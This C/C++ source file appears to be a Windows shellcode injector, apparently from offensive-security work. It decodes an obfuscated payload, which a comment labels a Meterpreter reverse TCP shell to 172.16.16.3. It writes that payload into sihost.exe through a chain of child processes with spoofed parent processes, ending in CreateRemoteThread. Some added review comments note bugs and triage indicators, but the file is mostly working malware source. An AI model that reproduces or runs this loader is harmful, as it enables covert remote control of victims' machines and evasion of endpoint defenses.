#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>
#include <iostream>
#include <stdarg.h>
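/**
 * Format a debug message and emit it either to the console (_CONSOLE builds)
 * or to the debugger via OutputDebugStringA.
 *
 * @param fmt printf-style format string supplied by the caller.
 * @param ... arguments consumed by @p fmt.
 *
 * The message is truncated to sizeof msg - 1 characters; vsnprintf always
 * NUL-terminates, so a long message can no longer overrun the stack buffer
 * the way the previous unbounded _vsprintf_l call could.
 */
void _dbg_printf(const char *fmt, ...)
{
    char msg[2048] = {0};
    va_list args;
    va_start(args, fmt);
    // Bounded formatting instead of the unbounded _vsprintf_l.
    vsnprintf(msg, sizeof msg, fmt, args);
    va_end(args);
#ifdef _CONSOLE
    // The formatted text must not be passed as a format string a second time:
    // a '%' that arrived through one of the arguments would be re-interpreted
    // (format-string bug). fputs prints it verbatim.
    fputs(msg, stdout);
    fputc('\n', stdout);
#else
    OutputDebugStringA(msg);
#endif
}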
// Debug-only logging: outside _DEBUG builds PRINTF expands to nothing, so none
// of the PRINTF strings in this file reach a release binary.
#ifdef _DEBUG
#define PRINTF(fmt, ...) _dbg_printf(fmt, __VA_ARGS__)
#else
#define PRINTF(...)
#endif
// setting global vars in BSS
// The globals below are placed in a dedicated PE section named "shared", which
// the linker directive at the end of this run marks read/write/SHARED (RWS).
// A shared section is mapped once and seen by every process running this
// image, so the buffer pointer and handles stored here are meant to persist
// across the separate process instances this program starts.
// NOTE(review): a writable shared section is unusual in ordinary application
// binaries and is a useful indicator during static triage of this image.
#pragma bss_seg("shared")
int buffer;
PVOID sharedRemoteBuffer;
HANDLE remoteProcessHandle;
HANDLE remoteProcessHandleDup;
#pragma bss_seg()
#pragma comment(linker, "/section:shared,RWS")
/*
 * Attach this process to the parent's console, falling back to the console of
 * the current process id. ERROR_ACCESS_DENIED from AttachConsole means a console
 * is already attached and counts as success.
 *
 * Returns false only when the fallback attach fails with any other error.
 * Not referenced by the code visible in this file.
 */
bool bAttachToConsole()
{
    if (AttachConsole(ATTACH_PARENT_PROCESS)) {
        return true;
    }
    if (GetLastError() == ERROR_ACCESS_DENIED) {
        return true; // already has a console
    }
    if (AttachConsole(GetCurrentProcessId())) {
        return true;
    }
    const DWORD attachError = GetLastError();
    return attachError == ERROR_ACCESS_DENIED; // already has a console
}
static void* DecodeShellcode(__out SIZE_T *size)
{
//encoded shellcode here / windows/meterpreter/reverse_tcp lport 444 lhost 172.16.16.3
unsigned char shellcode[] = "\x84\x27\x56\xd9\x84\xd6\xe8\x79\x29\x87\x4e\x3e\xae\x92\x6c\xd6\xce\x43\x33\xd7\xcf\x43\xeb\x21\xd7\x89\xae\xd6\x1e\x2a\x57\xff\xd6\x8f\x47\xfe\x56\x8e\x55\xff\xd6\x00\x86\x16\xd9\x77\xa4\x59\x56\x4f\x84\x51\x81\xe6\x20\xf7\xd2\x20\xb3\x0b\x6c\x79\x29\xaf\x64\x16\xa4\xd8\x46\x70\x0f\xdd\x84\x92\xa7\xe3\x26\x75\x20\xf6\x04\x3d\xa7\xe3\x26\x7d\x20\x66\xb8\x77\xe7\x3b\x4a\x40\x20\xf6\x00\x34\xa7\xb4\x74\xec\xae\xab\xc1\x7e\x2b\x96\x44\x41\x10\x26\x66\x1e\x96\xce\xd1\x33\x01\xad\x47\x4f\xe4\x96\x1d\x31\xae\x8e\x6e\x24\x62\xa2\x63\x7a\x48\xc7\xaf\x8e\xe0\x92\x6c\x79\x58\x97\x5f\x3e\xae\x92\x65\xc9\x31\x09\xa2\x37\x8e\x88\x1d\x70\x2a\x0f\x3f\x36\xaa\x98\x45\x59\x33\xfb\x84\x37\x51\xab\xc5\x5f\x10\xaf\x3f\xb8\xbf\x9b\x4c\xa3\x20\xa1\x56\xab\x86\xaa\x55\xd8\x01\xa7\x76\x39\xb2\x3c\x52\xf0\x49\x0e\xca\x3f\x06\xb5\x56\xd7\x32\x8c\xc6\x4f\xa6\x16\x45\x59\x33\x4b\x66\x4f\x2f\x9b\xe4\x08\x21\x04\x67\x1e\xb4\xba\x1d\xf9\x38\x8e\x6e\x24\x86\x99\x44\x72\xe2\xac\x05\x16\xa5\xba\x47\x51\x62\x8e\x3e\xa3\xaa\xba\x26\x86\x35\x8c\x66\x15\xe5\x9b\x1d\x3b\x14\xee\xb1\xc1\x51\x39\x65\x5f\x52\xed\x67\xe9\x40\xbf\xa1\x74\xa7\x09\x40\x3e\x86\x58\x65\x48\x15\xae\xb6\x66\x27\x7c\xa8\x99\xd6\x3d\x24\x17\x79\xfe\x22\x56\x27\x09\x28\x78\xae\xba\xa6\x70\x18\xbb\x67\xc6\xf6\x1b\x82\xbd\xc9\x78\xf4\x54\xc4\x9b\x5d\x45\x43\xcc\xe7\x18\xb6\x3b\x4a\x40\x43\xed\x67\x69\x2e\x71\xdf\x0e\x29\x87\x4e\x3e\x51\x28\x45\x48\xb1\x9a\x8c\x3e\xae\x92\x00\x79\x6f\x87\x8b\x3e\x00\x92\xa0\x79\x2f\x87\x8b\x3e\x43\x92\x22\x79\xc5\x87\x4e\x3e\xe5\x9b\x5d\x41\x00\x7f\x56\x49\x8e\x92\x6c\xd0\x0f\xbe\x67\x69\x66\xe1\xaf\x21\x29\x87\x4e\x3e\x51\x28\x71\xe6\x29\x87\x4e\x33\xae\x1c\x6c\xf7\x29\x89\x4e\x50\xae\xd5\x6c\x9c\x29\x62\x4e\x52\xae\xd4\x6c\xbc\x29\x29\x4e\xf2\xae\x94\x6c\xbc\x29\x6a\x4e\x70\xae\x7e\x6c\x9c\x29\x6f\x4e\x56\xae\xfa\x6c\x91\x29\x81\x4e\x56\xae\xdb\x6c\x15\x29\x80\x4e\xd7\xae\x5a\x6c\x91\x29\xef\x4e\x96\xae\xfe\x6c\x10\x29\xce\x4e\x93\xae\x1c\x6c\xb5\x29\xc9\x4e\xd0\xae\xde\x6
c\x70\x29\xad\x4e\x11\xae\x34\x6c\x13\x29\xe1\x4e\x14\xae\x14\x6c\x7f\x29\xaa\x4e\xd6\xae\x95\x6c\x53\x29\xcc\x4e\x96\xae\xb8\x6c\x15\x29\xa0\x4e\x11\xae\xdc\x6c\x93\x29\xac\x4e\xd7\xae\x1b\x6c\x7f\x29\x61\x4e\x72\xae\x9d\x6c\xb7\x29\xcd\x4e\xf6\xae\x37\x6c\x74\x29\xea\x4e\xd6\xae\x99\x6c\xb7\x29\x8c\x4e\x50\xae\x98\x6c\x7e\x29\x2f\x4e\x93\xae\x3a\x6c\xb4\x29\x0f\x4e\x18\xae\xd9\x6c\x76\x29\x69\x4e\xf0\xae\xfa\x6c\x92\x29\x29\x4e\x34\xae\xda\x6c\x7e\x29\xe9\x4e\x10\xae\x5a\x6c\xff\x29\x61\x4e\x38\xae\xbe\x6c\x52\x29\x6c\x4e\x30\xae\xb8\x6c\xbf\x29\xc1\x4e\xb8\xae\xb9\x6c\x91\x29\xef\x4e\x10\xae\xfc\x6c\xbf\x29\x0e\x4e\x71\xae\xbf\x6c\x72\x29\x0f\x4e\x14\xae\x92\x6c\x70\x18\xbf\x24\x75\x86\x99\xc5\x48\x91\xae\x3e\x26\x2a\x3b\x4a\x40\x43\x8e\xb6\x26\xae\xb2\x7c\x79\x23\xed\x24\x17\x56\xca\x7f\x7b\x5f\xec\xb1\x84\xa7\xa3\xb4\x70\x59\x9a\x4a\x37\x9f\x6e\x65\x48\x16\xae\xb6\x66\x8a\x66\x0d\x75\xd6\x3d\xfe\x26\x4f\x02\xc1\x79\x29\x87\x47\x4f\x46\x93\xdc\x61\xa7\xc0\x47\x0f\x95\x9b\x93\x41\x20\xbf\x72\x3a\x84\xf8\x66\x70\x3e\xe7\x4e\x3e\xae\xf2\x6c\x79\x29\x8d\x67\x0f\xb2\x9b\x1c\xe4\x2d\x8e\x7f\xc2\x87\xa3\x53\xf0\x18\xbb\xc7\x0f\xf3\xbb\x94\x21\x72\x3c\x13\x17\x51\x28\xdc\x61\xa7\x22\x33\x7c\xa7\xe3\x84\x7b\x99\x9f\xc0\x5a\xa7\xe2\x94\x78\x64\xe7\x45\x37\x9f\x72\x45\x48\x36\xca\x4d\x16\x85\x9b\x5d\x47\x64\x43\x05\x17\xf9\xe8\x67\xca\xf0\x87\x4e\x3e\xae\x6d\xd6\x34\x68\x6c\x47\x0f\x90\xdf\x8f\x32\x63\x8a\x4e\x58\xae\x92\x45\x48\x35\xca\xce\x16\x85\xbb\x3b\x03\x22\x34\x97\x3e\xae\x92\x6c\x86\x93\x2e\x68\x26\xc4\xd9\x65\x48\x17\x2e\x68\x07\xc4\xf8\x06\x13\x00\xd0\xfc\x35\xd9\xa0\x6c\x79\x29\x87\xb1\x84\x1e\x8a\xc2\xf8\x20\x78\xb7\xb0\xee\xef\x1b\x64\xf2\x87\x4e\x3e\xa7\xa3\x52\x13\x62\xae\xb6\x66\x0e\x83\xdf\x77\xd6\x3d\xfe\x26\x20\xaf\x65\x48\x17\xca\x87\x75\x87\xa3\x70\xd0\x18\x5f\x24\x73\xaf\xbb\x5d\x45\x00\x7f\x16\x31\x2e\x77\x88\x86\x93\x37\x56\xb0\xf7\xbb\x1d\xb8\x64\x84\x67\x0f\x92\xbb\x5d\x85\x00\xe2\x6a\x17\x9f\x8e\xc5\x48\xf1\xca\x2e\x75\x87\xc5\xc9\xb4\x1c\xff\x4
e\x3e\xae\x92\x93\xc3\x99\x9f\xaf\xae\x5d\x6d\x93\x86\x34\x05\x4e\x3e\xae\x3c\x60\x35\xa9\xdd\x80\x45\x6f\xd5\x07\x93\x89\xaf\x51\x46\x7c\x8f\x60\x38\x65\x8c\x47\xec\x27\xa3\x92\x50\x58\x66\x30\xea\x4f\x22\xc2\x86\xd6\x78\x47\xec\xc4\xb9\x21\x71\x62\xae\x7f\x04\x96\xce\x6e\x50\xd1\x9f\x4e\x3c\xae\x92\x45\x2e\x22\x13\x24\x82\xae\x92\x6c\x79\xd6\x3d\x47\x4c\xc4\xf8\x65\x48\xd5\x8e\x7f\x00\xa7\xa3\x37\x50\xd1\x9f\x4e\x3a\xae\x92\x45\x48\x16\xae\xb6\x66\x23\xb7\xe8\xb6\xd6\x3d\x47\x4e\x36\x96\xdc\x61\xc8\x17\x6b\xc1\x51\x6d\xa0\x08\xc9\x8e\x6e\x46\x1e\x8a\xc2\x43\x22\xff\x45\x73\xae\xb9\x1b\x65\x8a\xc2\x0f\x16\x9f\xc9\x93\xc3\x41\x55\xa7\x76\x62\xe4\x25";
void *r = malloc(sizeof(shellcode));
char *ptr = (char *) r;
for(int i = 0; i < sizeof(shellcode); i++) {
ptr[i] = ~((shellcode[i] << 3) | (shellcode[i] >> (8 - 3))); //ror
}
//printf("Length: %d\n", sizeof(shellcode));
//for (int i = 0; i < sizeof shellcode-1; i++) {
// printf("\\x%02x", shellcode[i]);
//}
*size = sizeof(shellcode);
return r;
}
bool CreateProcessWithParent(DWORD parentId, PWCHAR arg) {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, parentId);
if (!hProcess)
return false;
SIZE_T size;
::InitializeProcThreadAttributeList(nullptr, 1, 0, &size);
auto buffer = std::make_unique<BYTE[]>(size);
auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());
::InitializeProcThreadAttributeList(attributes, 1, 0, &size);
::UpdateProcThreadAttribute(attributes, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
&hProcess, sizeof(hProcess), nullptr, nullptr);
STARTUPINFOEX si = { sizeof(si) };
si.lpAttributeList = attributes;
PROCESS_INFORMATION pi;
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
::SetHandleInformation(remoteProcessHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);
WCHAR AppName[] = L".\\RemoteThreadInject.exe";
WCHAR cmdline[100];
WCHAR base[] = L".\\RemoteThreadInject.exe %ws";
swprintf_s(cmdline, base, arg);
BOOL created = ::CreateProcess(AppName, cmdline, 0, 0, TRUE, EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, 0, 0, (STARTUPINFO*)&si, &pi);
HANDLE localProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pi.dwProcessId);
DuplicateHandle(GetCurrentProcess(),remoteProcessHandle,localProc,&remoteProcessHandleDup,0,TRUE,DUPLICATE_SAME_ACCESS);
DuplicateHandle(localProc, remoteProcessHandleDup, localProc, &remoteProcessHandle, 0, TRUE, DUPLICATE_SAME_ACCESS);
ResumeThread(pi.hThread);
PRINTF("%ws - %ws", AppName, cmdline);
::CloseHandle(hProcess);
::DeleteProcThreadAttributeList(attributes);
return created;
}
/*
 * Look up a running process by executable name (case-insensitive compare
 * against PROCESSENTRY32.szExeFile) using a Toolhelp32 process snapshot.
 *
 * @param lpProcessName image file name to search for, e.g. L"name.exe".
 * @return the id of the first matching process, or 0 when nothing matches or
 *         the snapshot could not be created or iterated.
 *
 * NOTE(review): on the Process32First failure path the function returns
 * without closing hSnapshot, leaking the handle, and the message printed there
 * says "create snapshot" although CreateToolhelp32Snapshot had succeeded.
 */
DWORD FindProcByName(LPCWSTR lpProcessName)
{
HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
PRINTF("Failed to create snapshot. LastError %d", GetLastError());
return 0;
}
PROCESSENTRY32 pe;
// dwSize must be set before Process32First or the call fails.
pe.dwSize = sizeof(pe);
if (!::Process32First(hSnapshot, &pe)) {
PRINTF("Failed to create snapshot. LastError %d", GetLastError());
return 0;
}
DWORD dwPid = 0;
do {
if (_wcsicmp(lpProcessName, pe.szExeFile) == 0) {
dwPid = pe.th32ProcessID;
PRINTF("[*] Target PID = %d", dwPid);
}
// The loop condition stops at the first match; later processes with the
// same name are never considered.
} while(::Process32Next(hSnapshot, &pe) && dwPid == 0);
CloseHandle(hSnapshot);
return dwPid;
}
// Stage names indexed by the value parseArgs1 returns (index 0 is the
// "no argument" stage). Not referenced by the code visible in this file.
// NOTE(review): entry 2 is "WPA" here, but parseArgs1 maps value 2 to L"WPM";
// the two tables disagree.
const char *args[] = {
"",
"VA",
"WPA",
"VP",
"CRT"
};
/*
 * Map a stage name given on the command line to its numeric stage index.
 *
 * @param arg wide string such as L"VA"; may be NULL.
 * @return 1 for L"VA", 2 for L"WPM", 3 for L"VP", 4 for L"CRT"; 0 for NULL or
 *         any other value. The comparison is case-sensitive.
 */
int parseArgs1(const wchar_t *arg)
{
    static const wchar_t *const stageNames[] = { L"VA", L"WPM", L"VP", L"CRT" };
    if (arg == NULL) {
        return 0;
    }
    const size_t count = sizeof stageNames / sizeof stageNames[0];
    for (size_t idx = 0; idx < count; idx++) {
        if (wcscmp(arg, stageNames[idx]) == 0) {
            return (int)idx + 1; // table position + 1 is the stage number
        }
    }
    return 0;
}
int wmain(int argc, wchar_t *argv[])
{
PRINTF("[*] ...Running Main\n");
STARTUPINFOA si;
si = {};
PROCESS_INFORMATION child = {};
int targetPid;
DWORD fakePPIDPid = 0;
DWORD returnLength = 0;
WCHAR fakePPID[] = L"sihost.exe";
WCHAR target[] = L"sihost.exe";
BOOL result = TRUE;
int c = 0;
if (argc > 1)
c = parseArgs1(argv[1]);
SIZE_T size = 0;
void* shellcode = DecodeShellcode(&size);
SIZE_T mem_size = ((size % 4096) == 0) ? size : (size / 4096) + 4096;
DWORD old = 0;
char targetImage[MAX_PATH] = {};
const char* base = ".\\RemoteThreadInject.exe %s";
const char* prefix = "null";
fakePPIDPid = FindProcByName(fakePPID);
HANDLE remoteThread = NULL;
switch(c) {
case 0:{
PRINTF("[*] Step 0 - Process PID is: %d\n", GetCurrentProcessId());
targetPid = FindProcByName(target);
PRINTF("%d target image\n", targetPid);
remoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, targetPid);
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
if (remoteProcessHandle == NULL) {
PRINTF("Cannot open processs. LastError %d\n", GetLastError());
return 1;
}
WCHAR prefix_new[] = L"VA";
PRINTF("%s target image\n", targetImage);
CreateProcessWithParent(fakePPIDPid, prefix_new);
ExitProcess(0);
break;
}
case 1: {
PRINTF("[*] Step 1 - Current PID is: %d\n", GetCurrentProcessId());
PRINTF("\t[*] Executing Virtual Alloc");
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
sharedRemoteBuffer = VirtualAllocEx(remoteProcessHandle, NULL, mem_size, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);
PRINTF("\t[*] shared buffer at: 0x%x\n", sharedRemoteBuffer);
if (sharedRemoteBuffer == NULL) {
PRINTF("Cannot allocate memory on remote process. LastError %d", GetLastError());
return 1;
}
WCHAR prefix_new[] = L"WPM";
CreateProcessWithParent(fakePPIDPid, prefix_new);
ExitProcess(0);
break; }
case 2: {
PRINTF("[*] Step 2 - Current PID is: %d", GetCurrentProcessId());
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
PRINTF("\t[*] Executing Write Process Memory");
if (WriteProcessMemory(remoteProcessHandle, sharedRemoteBuffer, shellcode, size, NULL) == FALSE) {
PRINTF("Error using WriteProcessMemory. LastError %d", GetLastError());
return 1;
}
memset(shellcode, 0, size);
free(shellcode);
WCHAR prefix_new[] = L"VP";
CreateProcessWithParent(fakePPIDPid, prefix_new);
ExitProcess(0);
break; }
case 3: {
PRINTF("[*] Step 3 - Current PID is: %d", GetCurrentProcessId());
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
PRINTF("\t[*] Executing Virtual Protect");
if (VirtualProtectEx(remoteProcessHandle, sharedRemoteBuffer, mem_size, PAGE_EXECUTE_READWRITE, &old) == FALSE) {
PRINTF("Error on VirtualProtectEx. LastError %d", GetLastError());
return 1;
}
WCHAR prefix_new[] = L"CRT";
CreateProcessWithParent(fakePPIDPid, prefix_new);
ExitProcess(0); }
case 4: {
PRINTF("[*] Step 4 - Current PID is: %d", GetCurrentProcessId());
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandleDup);
PRINTF("\t[*] Executing Create Remote Thread");
remoteThread = CreateRemoteThread(remoteProcessHandleDup, NULL, 0, (LPTHREAD_START_ROUTINE)sharedRemoteBuffer, NULL, 0, NULL);
if (remoteThread == NULL) {
PRINTF("Cannot Create Thread on remote process. LastError %d", GetLastError());
return 1;
}
WaitForSingleObject(remoteThread, INFINITE);
PRINTF("[*] - Exiting");
ExitProcess(0);
break; }
}
ResumeThread(child.hThread);
WaitForSingleObject(child.hProcess, INFINITE);
CloseHandle(child.hThread);
CloseHandle(child.hProcess);
remoteProcessHandle = NULL;
if (remoteProcessHandle != NULL) {
CloseHandle(remoteProcessHandle);
}
return 0;
}
/*
 * GUI-subsystem entry point: splits the raw command line into a wide argv[]
 * with CommandLineToArgvW and forwards it to wmain.
 *
 * @return 0 when the command line could not be parsed; otherwise no value is
 *         returned at all (see note).
 *
 * NOTE(review): there is no return statement after the wmain call, so control
 * falls off the end of a non-void function, and the array returned by
 * CommandLineToArgvW is never released with LocalFree.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
LPWSTR* szArglist;
int nArgs;
int i;
PRINTF("[*] ...Running WinMain\n");
szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
if (NULL == szArglist)
{
PRINTF("CommandLineToArgvW failed\n");
return 0;
}
// Debug-only echo of every argument before handing them to wmain.
else for (i = 0; i < nArgs; i++) PRINTF("%d: %ws", i, szArglist[i]);
wmain(nArgs, szArglist);
}